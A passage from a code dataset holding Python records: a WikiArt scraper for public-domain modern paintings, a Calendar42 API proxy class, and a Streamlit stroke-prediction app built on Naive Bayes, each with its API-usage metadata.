"rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 71, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 71, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 88, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 88, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 88, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 95, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 95, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 95, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 105, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 111, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 125, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 125, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 136, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 136, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 151, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 151, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 151, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 156, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 156, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 156, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 168, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 168, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 168, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 176, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 176, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 176, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 180, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 180, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 180, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 127, "usage_type": "call"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 187, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 193, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 193, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 193, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 200, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 200, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 200, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 204, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 204, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 204, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 182, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 207, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 207, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 237, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 237, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 237, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 240, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 240, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 240, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 217, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 283, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 283, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 283, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 293, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 293, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 293, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 307, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 307, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 311, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 311, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 311, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 242, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 332, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 332, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 332, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 344, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 344, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 344, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 313, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 357, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 357, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 357, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 362, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 362, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 362, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 374, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 374, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 374, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 378, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 378, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 378, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 346, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 381, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 381, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 393, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 393, "usage_type": "name"}, {"api_name": "django.contrib.auth.hashers.check_password", "line_number": 419, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 423, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 423, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 423, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 436, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 436, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 436, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 440, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 440, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 440, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 398, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 457, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 457, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 457, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 465, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 465, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 442, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 492, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 492, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 492, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 497, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 497, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 497, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 473, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 520, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 520, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 520, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 525, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 525, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 525, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 529, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 529, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 529, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 499, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 541, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 541, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 541, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 550, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 550, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 550, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 557, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 557, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 557, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 559, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 573, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 573, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 573, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 577, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 577, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 577, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 531, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 596, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 596, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 596, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 615, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 615, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 615, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 626, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 626, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 626, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 629, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 629, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 629, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 617, "usage_type": "call"}]} +{"seq_id": "74423526", "text": "import urllib\nimport urllib.request\nimport re\nfrom bs4 import BeautifulSoup\nimport time\nimport os\n\nfile_path = \"modern_paintings\"\nos.makedirs(file_path, exist_ok=True)\n\ndef url_open(url):\n req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlopen(req,timeout=50).read()\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\n return BeautifulSoup(s, \"lxml\")\n\ndef urlretrieve(image_url, save_path):\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlretrieve(image_url, save_path)\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\ndef get_images(url):\n print(url)\n genre_soup = url_open(url)\n artist_list_main = genre_soup.find(\"main\")\n lis = artist_list_main.find_all(\"li\")\n\n # for each list element\n for li in lis: \n born = 0\n died = 0\n\n # get the date range\n for line in li.text.splitlines():\n if line.startswith(\",\") and \"-\" in line:\n parts = line.split('-')\n if len(parts) == 2:\n born = int(re.sub(\"[^0-9]\", \"\",parts[0]))\n died = int(re.sub(\"[^0-9]\", \"\",parts[1]))\n\n # look for artists who may have created work that could in public domain\n if born>1800 and died>0 and died<1978:\n link = li.find(\"a\")\n artist = link.attrs[\"href\"]\n\n # get the artist's main page\n artist_url = base_url + artist\n artist_soup = url_open(artist_url)\n\n # only look for artists with the word modern on their main page\n if \"modern\" in artist_soup.text.lower():\n print(artist + \" \" + str(born) + \" - \" + str(died))\n\n # get the artist's web page for the artwork\n url = base_url + artist + '/all-works/text-list'\n artist_work_soup = url_open(url)\n\n # get the main section\n artist_main = artist_work_soup.find(\"main\")\n image_count = 0\n artist_name = artist.split(\"/\")[2]\n os.makedirs(file_path + \"/\" + artist_name, exist_ok=True)\n\n # get the list of artwork\n lis = artist_main.find_all(\"li\")\n\n # for each list element\n for li in lis:\n link = li.find(\"a\")\n\n if link != None:\n painting = link.attrs[\"href\"]\n\n # get the painting\n url = base_url + painting\n print(url)\n\n try:\n painting_soup = url_open(url)\n\n except:\n print(\"error retreiving page\")\n continue\n\n # check the copyright\n if \"Public domain\" in painting_soup.text:\n\n # get the url\n og_image = painting_soup.find(\"meta\", {\"property\":\"og:image\"})\n image_url = og_image[\"content\"].split(\"!\")[0] # ignore the !Large.jpg at the end\n print(image_url)\n\n parts = url.split(\"/\")\n painting_name = parts[-1]\n save_path = file_path + \"/\" + artist_name + \"/\" + painting_name + \".jpg\"\n\n #download the file\n try:\n print(\"downloading to \" + save_path)\n time.sleep(0.2) # try not to get a 403 \n urlretrieve(image_url, save_path)\n image_count = image_count + 1\n except Exception as e:\n print(\"failed downloading \" + image_url, e)\n\nbase_url = \"https://www.wikiart.org\"\nurls = []\nfor c in range(ord('a'), ord('z') + 1):\n char = chr(c)\n artist_list_url = base_url + \"/en/Alphabet/\" + char + \"/text-list\"\n urls.append(artist_list_url)\n\nprint(urls)\n\nfrom concurrent.futures import ThreadPoolExecutor\nexecutor = None\nwith ThreadPoolExecutor(max_workers = 16) as executor:\n ex = executor\n executor.map(get_images, urls)\n ", "sub_path": "download.py", "file_name": "download.py", "file_ext": "py", "file_size_in_byte": 3991, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 12, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 17, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 32, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 32, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 56, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 80, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "596506285", "text": "import logging\r\nimport requests\r\n\r\nfrom apiproxy import constants\r\nfrom .exceptions import LoggedDetailsAPIException\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass APIActionCaller():\r\n\t\"\"\"Abstract class which must be inherited to handle a call to a Calendar42 API action\r\n\t\r\n\tThe abstract methods to implement are:\r\n\t* extract_data()\r\n\t* get_relative_url()\r\n\t\"\"\"\r\n\t\r\n\tdef __init__(self, token):\r\n\t\t\"\"\"\r\n\t\t@param {str} token\tThe authentication token to use when calling the Calendar42 API\r\n\t\t\"\"\"\r\n\t\tself._token = token\r\n\t\r\n\tdef call(self, *args, **kwargs):\r\n\t\t\"\"\"Calls the Calendar42 API and returns the response\r\n\t\tParameters (if any) are forwarded to self.get_relative_url(), which may need some runtime data to compute the URL\r\n\t\t\r\n\t\t@return\t{dict}\tThe JSON API response\r\n\t\t\"\"\"\r\n\t\t\r\n\t\t# Call the Calendar42 API\r\n\t\tfull_url = constants.CALENDAR42_API_BASE_URL + self.get_relative_url(*args, **kwargs)\r\n\t\t\r\n\t\theaders = {\r\n\t\t\t'Accept': 'application/json',\r\n\t\t\t'Content-type': 'application/json',\r\n\t\t\t'Authorization': 'Token %s' % self._token,\r\n\t\t}\r\n\t\tresponse = requests.get(full_url, headers=headers)\r\n\t\t\r\n\t\t# Parse response as JSON\r\n\t\ttry:\r\n\t\t\tjson_data = response.json()\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the body of the response which couldn't get parsed to JSON: %s\" % (full_url, response.text))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\t\r\n\t\t# Extract desired information\r\n\t\ttry:\r\n\t\t\tif 'error' in json_data:\r\n\t\t\t\t# Forward error from Calendar42 API to client\r\n\t\t\t\traise LoggedDetailsAPIException(json_data['error']['message'])\r\n\t\t\t\t\r\n\t\t\treturn self.extract_data(json_data)\r\n\t\texcept (KeyError, ValueError, AttributeError) as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the JSON data which didn't fit the expected format: %s\" % (full_url, json_data))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef extract_data(self, json_data):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tExtracts the desired information from the JSON data returned by the Calendar42 API\r\n\t\t@param {dict} json_data\r\n\t\t@return {dict}\tThe extracted data\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef get_relative_url(self, *args, **kwargs):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tReturns the end of the URL, corresponding to the API action to call\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise LoggedDetailsAPIException()\r\n\r\n\r\nclass EventDetailsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets details (ID and title) of an event\"\"\"\r\n\r\n\tdef get_relative_url(self, event_id):\r\n\t\treturn constants.CALENDAR42_API_EVENT.format(event_id)\r\n\r\n\tdef extract_data(self, json_data):\r\n\t\traw_details = json_data['data'][0]\r\n\t\tdetails = {\r\n\t\t\t'id': raw_details['id'],\r\n\t\t\t'title': raw_details['title'],\r\n\t\t}\r\n\t\treturn details\r\n\r\n\t\t\r\nclass EventParticipantsAPIActionCaller(APIActionCaller):\r\n\t\"\"\"Gets list of participants to an event\"\"\"\r\n\r\n\tdef get_relative_url(self, event_id):\r\n\t\treturn constants.CALENDAR42_API_PARTICIPANTS.format(event_id)\r\n\r\n\tdef extract_data(self, json_data):\r\n\t\treturn [item['subscriber']['first_name'] for item in json_data['data']]\r\n", "sub_path": "apiproxy/events/api_action_caller.py", "file_name": "api_action_caller.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_BASE_URL", "line_number": 31, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 31, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 46, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 52, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 58, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 68, "usage_type": "call"}, {"api_name": "exceptions.LoggedDetailsAPIException", "line_number": 76, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT.format", "line_number": 83, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_EVENT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 83, "usage_type": "name"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS.format", "line_number": 98, "usage_type": "call"}, {"api_name": "apiproxy.constants.CALENDAR42_API_PARTICIPANTS", "line_number": 98, "usage_type": "attribute"}, {"api_name": "apiproxy.constants", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "290191003", "text": "#from fastapi import FastAPI\r\n#from pydantic import BaseModel\r\nimport pickle\r\nimport streamlit as st\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n'''\r\napp=FastAPI()\r\nclass request_body(BaseModel):\r\n Age:float\r\n Hypertension:str\r\n Heart_disease:str\r\n Average_glucose: float\r\n BMI: float\r\n Marital_status: str\r\n Gender: str\r\n Work_type: str\r\n Residence:str\r\n Smoking_status: str\r\n'''\r\ndf=pd.read_csv(\"stroke_data_Cleaned3.csv\",header=0)\r\nprint(df.head())\r\n\r\n#Creating X and y Variables for Training Testing datasets\r\nX=df.drop([\"stroke\"],axis=1)\r\ny=df[\"stroke\"] #Target Variable\r\n\r\n#Creating Training Testing datasets\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test= train_test_split(X,y, test_size=0.2, random_state=5)\r\n#I have tried using K-best(taking 6 Variables) and the Classification Report doesnot show much Variation thus we are not using K-best\r\n\r\n#Creating Classification Models\r\n#I am using Naive Bayes Classification here, thus Scaling and One Hot Encoding is not Required\r\nmodel=GaussianNB()\r\nmodel.fit(X_train,y_train)\r\ny_pred=model.predict(X_test)\r\n\r\n#Testing effeciency of Naive Bayes Classifier\r\nfrom sklearn.metrics import confusion_matrix, classification_report,recall_score,f1_score\r\ncm=confusion_matrix(y_test, y_pred)\r\nprint(\"Confusion Matrix\")\r\nprint(cm)\r\ncr=classification_report(y_test, y_pred)\r\nprint(\"Classification Report\")\r\nprint(cr)\r\n#Since this dataset is not balanced accuracy is not the measure we will be looking for\r\n# Here we want to reduce the number of False negatives so we will look at Recall and F1 Score\r\nrs=recall_score(y_test,y_pred, average=\"weighted\")\r\nfs=f1_score(y_test,y_pred,average=\"weighted\")\r\nprint(\"Recall Value: \",rs)\r\nprint(\"F1 Score: \",fs)\r\n\r\n#Pickle is used for saving .pkl file\r\n#We are using .pkl file because we are going to deploy the model on Streamlit\r\npickle.dump(model,open('stroke.pkl','wb'))\r\nloaded_model=pickle.load(open('stroke.pkl','rb'))\r\n\r\n#For deploying on the Website\r\ndef predict_input_page():\r\n loaded_model = pickle.load(open('stroke.pkl', 'rb'))\r\n st.title(\"Stroke Prediction Model\")\r\n Age=st.slider(\"Age: \", min_value=0, max_value=90)\r\n Hypertension = st.radio(\"Do you suffer from Hypertension: \",(\"Yes\",\"No\"))\r\n Heart_disease=st.radio(\"Do you suffer from Heart Disease: \",(\"Yes\",\"No\"))\r\n Average_glucose=st.slider(\"Average Glucose Levels: \", min_value=50, max_value=280)\r\n BMI=st.slider(\"BMI: \",min_value=10, max_value=70)\r\n Marrital_status=st.radio(\"Are you married: \",(\"Yes\",\"No\"))\r\n Gender=st.radio(\"What is your Gender: \",(\"Male\",\"Female\"))\r\n Work_type=st.radio(\"What is your Work type?\",(\"Private\",\"Self-employed\",\"children\",\"Govt_job\",\"Never_worked\"))\r\n Residence=st.radio(\"What is your area of Residence\",(\"Urban\",\"Rural\"))\r\n Smoking_status=st.radio(\"Enter your Smoking Status:\",(\"never smoked\",\"Unknown\",\"formerly smoked\",\"smokes\"))\r\n ok=st.button(\"Predict\")\r\n\r\n #Since we are taking the input as a string and the model needs the values in numbers we convert the String to int\r\n if Hypertension==\"Yes\":\r\n Hypertension= 1\r\n elif Hypertension==\"No\":\r\n Hypertension=0\r\n\r\n if Heart_disease==\"Yes\":\r\n Heart_disease= 1\r\n elif Heart_disease==\"No\":\r\n Heart_disease=0\r\n\r\n if Marrital_status==\"Yes\":\r\n Marrital_status=1\r\n elif Marrital_status==\"No\":\r\n Marrital_status=0\r\n\r\n if Gender==\"Male\":\r\n Gender=1\r\n elif Gender==\"Female\":\r\n Gender=0\r\n\r\n if Work_type==\"Govt_job\":\r\n Work_type=0\r\n elif Work_type==\"Never_worked\":\r\n Work_type=1\r\n elif Work_type==\"Private\":\r\n Work_type=2\r\n elif Work_type==\"Self-employed\":\r\n Work_type=3\r\n elif Work_type==\"children\":\r\n Work_type=4\r\n\r\n if Residence==\"Rural\":\r\n Residence=0\r\n elif Residence==\"Urban\":\r\n Residence=1\r\n\r\n if Smoking_status==\"Unknown\":\r\n Smoking_status=0\r\n elif Smoking_status==\"formerly smoked\":\r\n Smoking_status=1\r\n elif Smoking_status==\"never smoked\":\r\n Smoking_status=2\r\n elif Smoking_status==\"smokes\":\r\n Smoking_status=3\r\n\r\n testdata=np.array([[Age, Hypertension, Heart_disease, Average_glucose, BMI, Marrital_status,Gender,Work_type,Residence,Smoking_status]])\r\n classi=loaded_model.predict(testdata)[0]\r\n\r\n try:\r\n if ok==True:\r\n if classi == 0:\r\n st.success(\"Awesome! You are on low risk of getting Stroke\")\r\n elif classi == 1:\r\n st.error(\"Cautious! You are on high risk of getting Stroke\")\r\n except:\r\n st.info(\"Enter some Data\")\r\n\r\n\r\n\r\n\r\n", "sub_path": "ML_Project_2_209027.py", "file_name": "ML_Project_2_209027.py", "file_ext": "py", "file_size_in_byte": 4696, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 52, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 58, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 